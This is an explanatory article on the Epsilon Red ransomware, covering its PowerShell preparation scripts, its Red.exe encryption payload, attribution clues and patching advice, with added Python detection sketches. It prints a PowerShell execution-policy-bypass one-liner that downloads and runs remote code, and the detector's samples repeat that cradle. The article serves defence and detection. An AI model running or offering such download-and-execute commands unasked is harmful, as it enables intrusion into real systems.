Have you patched your servers?

A new ransomware threat, known as Epsilon Red, targets unpatched Microsoft-based servers in enterprise data centers. Named after a little-known Marvel comic villain, Epsilon Red was recently discovered by the cybersecurity firm Sophos. Since its discovery, the ransomware has attacked numerous organizations around the world.

What Is PowerShell?

According to Sophos, the malware combines a Go program with PowerShell scripts to attack its targets. The PowerShell scripting features of Epsilon Red give it the ability to compromise Microsoft-based servers. Microsoft's PowerShell is a command-line shell and scripting platform built on the .NET Framework.


PowerShell offers features such as remote command execution and access to core Microsoft APIs. These features make PowerShell useful for system administrators and users who want to automate OS management tasks and processes.

However, PowerShell can also be used as a powerful tool for creating malware. The scripts' ability to access Microsoft's Windows Management Instrumentation (WMI) tools makes it an attractive option for attackers. The Windows Management Instrumentation interface allows PowerShell scripts to be recognized as inherently trustworthy by a Microsoft system. This inherent trust allows PowerShell scripts to be used as an effective cover for fileless ransomware.

Delivering Fileless Ransomware With PowerShell

Fileless ransomware is a form of malicious software that executes by piggybacking on legitimate software. PowerShell-based fileless malware uses PowerShell's ability to load directly into a device's memory. This helps shield the malware within PowerShell scripts from detection.

In a typical scenario, a script must first be written to a device's disk before it executes, which gives endpoint security solutions a chance to detect it. Since PowerShell is excluded from standard script execution processes, it can bypass endpoint security. In addition, the use of a bypass parameter in PowerShell scripts allows attackers to subvert script execution restrictions on the network.

An example of a PowerShell bypass parameter is:

        powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient).DownloadString('url'))

As you can see, it is relatively easy to design PowerShell bypass parameters.

In response, Microsoft released patches to address the remote malware execution vulnerability associated with PowerShell. Still, patches are only effective when they are applied. Many organizations have relaxed patching standards that leave their environments exposed, and Epsilon Red is designed to capitalize on that exposure.

The Double-Edged Usefulness of Epsilon Red

Since Epsilon Red is most effective against unpatched Microsoft servers, the malicious software can be used as both a ransomware and a reconnaissance tool. Whether or not Epsilon succeeds in an environment gives an attacker deeper insight into the security capabilities of a target.

If Epsilon succeeds in accessing a Microsoft Exchange Server, the organization has shown that it does not follow common patching best practices. For an attacker, this may indicate how easily the rest of the target's environment can be infiltrated by Epsilon.

Epsilon Red uses obfuscation techniques to hide its payload. Obfuscation makes code unreadable and is used in PowerShell malware to counter the high readability of PowerShell scripts. With obfuscation, PowerShell cmdlet aliases are used to make it difficult for antivirus software to identify malicious scripts in PowerShell's logs.


Still, obfuscated PowerShell scripts can be identified by a trained eye. A common sign of an impending PowerShell script attack is the creation of a WebClient object. An attacker creates a WebClient object in PowerShell code to establish an external connection to a remote URL that hosts malicious code.

If an organization can be hacked because of relaxed patching, the odds that it has security protection capable of detecting obfuscated PowerShell scripts are lower. In contrast, if Epsilon Red fails to infiltrate a server, this tells an attacker that the target's network may be able to deobfuscate PowerShell malware quickly, making the attack less valuable.
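As an added example (not code from the article, from Sophos, or from Epsilon Red), the following Python sketch applies the detection points above to logged PowerShell command lines: it expands common cmdlet aliases, decodes a -EncodedCommand payload, and flags the WebClient-plus-Invoke-Expression download cradle. The alias table, the indicator patterns and the sample log lines are constructed assumptions of my own.

```python
import base64
import re

# Aliases used in place of full cmdlet names; assumption: a small illustrative table, not PowerShell's full alias list.
ALIASES = {"iex": "invoke-expression", "sal": "set-alias", "saps": "start-process", "iwr": "invoke-webrequest"}

# Indicators the article describes: execution-policy bypass, profile suppression, WebClient creation, download, in-memory execution.
INDICATORS = {
    "execution_policy_bypass": r"-e(?:xecutionpolicy|p)\s+bypass",
    "no_profile": r"-nop(?:rofile)?\b",
    "webclient_created": r"new-object\s+(?:system\.)?net\.webclient",
    "remote_download": r"\.download(?:string|file|data)\(",
    "invoke_expression": r"\binvoke-expression\b",
}

def decode_encoded_command(text):
    """Return the script hidden behind -EncodedCommand/-enc/-ec, or None if absent or undecodable."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)\s+([A-Za-z0-9+/=]{16,})", text, re.I)
    if not m:
        return None
    try:  # PowerShell expects the payload as base64 over UTF-16LE text
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def normalize(text):
    """Append any decoded -EncodedCommand payload, lowercase, and expand known aliases."""
    text = (text + " " + (decode_encoded_command(text) or "")).lower()
    for alias, cmdlet in ALIASES.items():
        text = re.sub(r"\b%s\b" % re.escape(alias), cmdlet, text)
    return re.sub(r"\s+", " ", text)

def scan(text):
    """Return the names of the indicators present in one command line or script block."""
    norm = normalize(text)
    return {name for name, pat in INDICATORS.items() if re.search(pat, norm)}

def is_download_cradle(text):
    """True for the pattern the article warns about: a WebClient fetches code that is then executed in memory."""
    return {"webclient_created", "remote_download", "invoke_expression"} <= scan(text)

# Constructed samples in the style of PowerShell script block logging (Event ID 4104); not real telemetry.
SAMPLES = [
    "powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient).DownloadString('http://example.invalid/a'))",
    "Get-ChildItem C:\\Logs -Filter *.log | Measure-Object",
]
INNER = "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/b')"
ENCODED_SAMPLE = "powershell.exe -nop -enc " + base64.b64encode(INNER.encode("utf-16le")).decode()
```

Running scan() over the constructed samples flags the first line and the encoded variant while leaving the benign Get-ChildItem line clean.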

Epsilon Red's Network Infiltration

The functionality of Epsilon Red is straightforward. The software uses a series of PowerShell scripts to infiltrate servers. These PowerShell scripts are numbered from 1.ps1 to 12.ps1. Each PowerShell script is designed to prepare a target server for the final payload.

Each PowerShell script in Epsilon Red has its own purpose. One script is designed to work around a target's network firewall rules. Another in the series is designed to uninstall a target's antivirus software.

As you might guess, these scripts work in unison to ensure that when the payload is delivered, a target will not be able to quickly stop its progression.

Delivering the Payload

When Epsilon's PowerShell scripts have paved the way for its final payload, it is delivered as an executable, Red.exe. Once it infiltrates a server, Red.exe scans the server's files and builds a list of the directory paths for each file it discovers. After the list is created, the parent malware process spawns a child process for each directory path in the list. Each ransomware child process then encrypts one directory path from the list file.

Once all of the directory paths on Epsilon's list have been encrypted, a .txt file is left to notify the target and state the attacker's demands. In addition, all accessible network nodes connected to the compromised server are then infiltrated, so the malware's reach into the network can advance.
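To illustrate how the fan-out described above (one child process per directory path) can be spotted, here is an added Python example, not Epsilon Red's code and not a Sophos detection: it looks for a parent that starts many children of the same image inside a short window, run over constructed Sysmon-style process-creation records. The payload path, timestamps, process IDs and thresholds are assumptions, and the example assumes the encryption children share the parent's image.

```python
from collections import defaultdict
from datetime import datetime

# Constructed process-creation records in the style of Sysmon Event ID 1; not real telemetry.
# Assumptions: the payload path is a placeholder and each encryption child shares the parent's image.
PAYLOAD = r"C:\Users\Public\Red.exe"
CMD = r"C:\Windows\System32\cmd.exe"
EVENTS = (
    [{"UtcTime": "2021-06-01 10:00:00.000", "ProcessId": 500, "ParentProcessId": 4, "Image": PAYLOAD}]
    # one child per directory path, started within seconds of each other
    + [{"UtcTime": "2021-06-01 10:00:%02d.000" % (1 + i), "ProcessId": 600 + i,
        "ParentProcessId": 500, "Image": PAYLOAD} for i in range(10)]
    # a benign scheduler-like parent: the same number of children, but spread one hour apart
    + [{"UtcTime": "2021-06-01 %02d:00:00.000" % (11 + i), "ProcessId": 700 + i,
        "ParentProcessId": 300, "Image": CMD} for i in range(10)]
)

def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")

def find_child_bursts(events, threshold=8, window_seconds=30):
    """Return [(parent_pid, image, peak_count)] for parents that start at least `threshold`
    children of one image within any interval of `window_seconds`."""
    by_parent = defaultdict(list)
    for e in events:
        by_parent[(e["ParentProcessId"], e["Image"])].append(parse_time(e["UtcTime"]))
    hits = []
    for (ppid, image), times in by_parent.items():
        times.sort()
        peak, start = 0, 0
        for end, t in enumerate(times):  # sliding window over the sorted start times
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            hits.append((ppid, image, peak))
    return sorted(hits, key=lambda h: -h[2])

if __name__ == "__main__":
    for ppid, image, peak in find_child_bursts(EVENTS):
        print("parent %d started %d x %s inside the window" % (ppid, peak, image))
```

With the default 30-second window only the burst from parent 500 is reported; the hourly cmd.exe children are ignored because they never cluster.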

Who's Behind Epsilon Red?

The identity of the attackers using Epsilon Red is still unknown, but some clues hint at their origins. The first clue is the name of the malware: Epsilon Red is an X-Men villain with a Russian origin story.

The second clue is in the .txt ransom note left by the code. It is similar to the note left by a ransomware gang known as REvil. However, this similarity does not indicate that the attackers are members of that gang. REvil runs a ransomware-as-a-service (RaaS) operation in which affiliates pay REvil for access to its malware.

Protecting Yourself From Epsilon Red

So far, Epsilon Red has successfully infiltrated unpatched servers. This means that one of the best defenses against Epsilon Red, and similar ransomware, is to ensure that your environment is properly patched and managed. In addition, a security solution that can quickly deobfuscate PowerShell scripts will be a beneficial addition to your environment.